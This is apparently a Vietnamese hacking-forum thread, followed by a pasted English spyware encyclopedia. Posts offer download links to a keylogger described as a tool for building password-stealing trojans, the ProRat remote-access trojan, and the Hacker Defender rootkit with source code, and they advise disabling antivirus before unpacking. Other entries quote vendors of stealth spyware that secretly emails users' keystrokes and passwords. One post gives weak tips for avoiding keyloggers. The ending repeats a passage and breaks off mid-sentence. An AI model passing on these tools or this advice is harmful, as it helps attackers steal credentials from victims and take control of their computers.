Link moi day anh em test thu nhe file keyloger (dùng tạo ra trojon lấy pass) http://www.uploading.com/get.php\?get=7Y5RX02C 2>bạn nhập số vào bên góc trái màn hình và nhấp vào Start dowload và tải về bạn chờ 25 giây và kích chuột vào Click here to download để tải về Backdoor(VNISS) Hi , em để lại vài kinh nghiệm cho mọi người để khỏi bị dính keylog nhé + Trong pass để vài dấu cách , trojan sẽ không nhận biết được dấu cách , mình thấy có mỗi loại bpk203 là khi gặp 1 dấu cách nó sẽ xuống 1 dòng . + Cách thứ 2 là chia pass ra làm 2 đoạn , đánh đoạn 2 trước , đoạn 1 sau , VD như pass=NgocQuang thì đánh Quang trước sau đó chỉ chuột về đầu dòng ( hoặc nhấn Home ) rồi đánh tiếp Ngọc + Cách 3 là đánh pass kiểu pass trong thư của tên harker chỉ hiện lên là pass , cói thể thay chữ b bằng chữ i . + Cách 4 là đi chat ngoài hàng thì nên mang theo USB , trong USB có cop BKAV2006 , mở BKAV trước rồi mới chat . Cách này dễ bị lây nhiễm Vius về máy mình lắm -Cách khác là không mở những tin nhắn kiểu http:// kể cả nhưng tin nhắn có đuôi *.gif , *.jpg ,*.wmv , Một sỗ trojan có thể được gắn lên File ảnh và File nhạc . Bạn gửi cho file có File đuôi *.exe mà ai mở ra thì công nhận là không còn gì dại bằng . Thường 1 ai đó muốn Share virus cho mọi người dùng cùng thì sẽ để nó dưới File nén kiểu *.zip hay *.rar để các trang cho upload không phát hiện ra đó là virus . - Cách hay nhất chưa bao giờ bị miss , đó là không đi chat Ai dùng cách này mà còn bị thì thôi bó tay Ronan_keating(VNISS) ProRat_v1.9_Fix2 Code: http://www.prorat.net/download/ProRat_v1.9.zip P/S: "A device attached to the system is not functioning" > tắt cái antivirus đi bung nén ra thì ko gặp lỗi này nữa! @YeuEmDaiKho(HCE) RootKit + Source Code Right Now rootkit is detectable by some Antiviruses To make it undectable you can modify the source code to make ur own RootKit Its a cool and powerful tool That can give u complete control of the R - Host Download: Code: http://hxdef.net.ru/download/hxdef100.zip YeuEmDaiKho(HCE) spyware guide and removal instructions Lướt web thấy bài viết rất cần thiết cho những ai quan tâm đến spyware và cách phòng tránh mình xin share bài viết này đến các bạn 007 Spy Software This product can be used for more than simply montioring keystrokes. It can set up monitoring schedules to watch web pages that are visited. It also has a "solid stealth technology that prevents virus scanners and spyware detectors from finding/disabling it." (From their website :http://www.e-spy- software.com/index.htm) From their website: "007 Spy Software is a stealthy computer monitoring software which allows you to secretly record all activities of computer users and automatically deliver logs to you via Email or FTP, including all areas of the system such as email sent, Web sites visited, every keystroke (including login/password of ICQ, MSN, AOL, AIM, and Yahoo Messenger or Webmail), file operations, online chat conversation, and take screen snapshot at set intervals just like a surveillance camera directly point at the computer monitor." http://www.e-spy-software.com/index.htm 123 PC Spy 123 PC Spy Key can record keystrokes, visited websites, and active programs. I can also capture screenshots and run invisible in the background. It sends the user a log via e-mail. From their site. "123 PC Spy is a powerful while easy-to-use spy utility that runs stealthly under MS Windows. This spyware allows you to monitor and record almost all activities on your PC, then it can create reports and send them to your expected email." http://www.pcspy.info/ 123mania Also known as: MatrixDialer 123 mania This is a spanish born adware. http://www.123mania.com 123Messenger Spanish Shopping Portal Dialer Translated roughly from the vendor in Spanish: "Contract of User: Using our program you specifically recognize and accept the following warnings and conditions: 1) the access to this Web, ace Ý like a its contents and services estß ·nicamente allowed to people of legal age. 2) You must be of legal age in his paÝs of residence (in the case of Espa±a, greater of 18 a±os). 3) When accepting the "Certificate of security" or the unloading of the file that shows its navigator, knows that instalarßn in its PC the programs that permitirßn to connect to him with our services. AsÝmismo, for its comfort, colocarßn direct access in its system to facilitate pr¾ximas to him connections. 4) You not exhibirß this material to minors or any other person who can be victim or who do not fulfill these conditions. 5) You deberß to pay the costs of conexi¾n telef¾nica. Knowing that to the program him desconectarß automßticamente of present his conexi¾n and him conectarß to a special n·mero of tarificaci¾n 906. Price MAXIMO per minute is of 1.06 euros from the fixed network of telefonÝa, and 1.357 euros from the m¾vil network, taxes including. You tambiÚn know that at any time podrß to to this end become disconnected of our services using bot¾n existing, extinguishing his m¾dem or hanging telÚfono seg·n comes in each case. The system him desconectarß automßticamente passed 30 minutes, deciding you freely if you wish to connect again. 6) All the rights of copyright and any other rights of intellectual and industrial property are reserved in favor of the holders, authors, publishers, people in charge and/or proprietors of this Web. AsÝmismo recognizes that estarßn in any case exentos of any responsibilities of Ýndole personal and/or econ¾mica that could derive: ã) Of the access of minors. 6b) Of utilizaci¾n of the program or software that allows the access to the services. 6c) Of the access and/or utilizaci¾n that any user makes of the contents and services. 7) For resoluci¾n of any controversies to raÝz of the present document, of the access to the Web or anyone of his contents, you he is specifically put under the espa±olas laws and jurisdicci¾n of the courts and courts of the city of Madrid, Espa±a, to which he confers ·nica competition exclusively and. 8) we requested to Him that if does not understand, does not fulfill or it does not accept some of the ends contained in the present contract does not continue with conexi¾n. Identificativos Data: Matrix Technology Network, S.A. CIF A-83491530 Apdo. 28080 Post office 13180 - Madrid" http://www.masminutos.com 123Search Also known as: Search123 This is a BHO. Side effects will be a likely decrease in system performance. They have a pay-per-click search engine. http://www.search123.com/directory.html 17lele Also known as: ADW_17lele (TrendMicro) Adware-17Lele (Mcafee) Trojan- Downloader.Win32.Agent.et (Kaspersky) TR/Dldr.Agent.ET Trojan.Downloader.Agent.Et.S Connect to the internet and downloads files without users knowledge 180 Search Assistant Also known as: Other Products: SVA Player SVAPlayer 180solutions 180 solutions MetricsDirect 180search Assistant 180 search Assistant Company appears to have evolved from the old "paid-to-surf" program Epipo. Comes along with some "advertiser supported" programs, a tactic known as bundling. Depending on the program (180 Solutions markets several) it may pop- up ads or in the case of the Zango application it may pop-up other websites based on keywords you use while surfing or searching. It is important to note that 180 Solutions derives financial benefit by popping up these 3rd party websites. To the best of our knowledge 180 Solutions does not track or store personally identifiable information as per their privacy policy. However it does transmits logs of every web page you visit. The URL or keyword is passed with a unique identifier to their advertising server when a targeted advertisement is shown. With the later versions of their software this logging can be disabled by using the tray icon. Heavily distributed through the use of "affiliates" via a process called bundling. Recent research by Ben Edelman (http://www.edelman.org) reports that it has been installed via browser security holes. We have also noted that 180 Solutions . searching. It is important to note that 180 Solutions derives financial benefit by popping up these 3rd party websites. To the best of our knowledge 180 Solutions does not track or store personally identifiable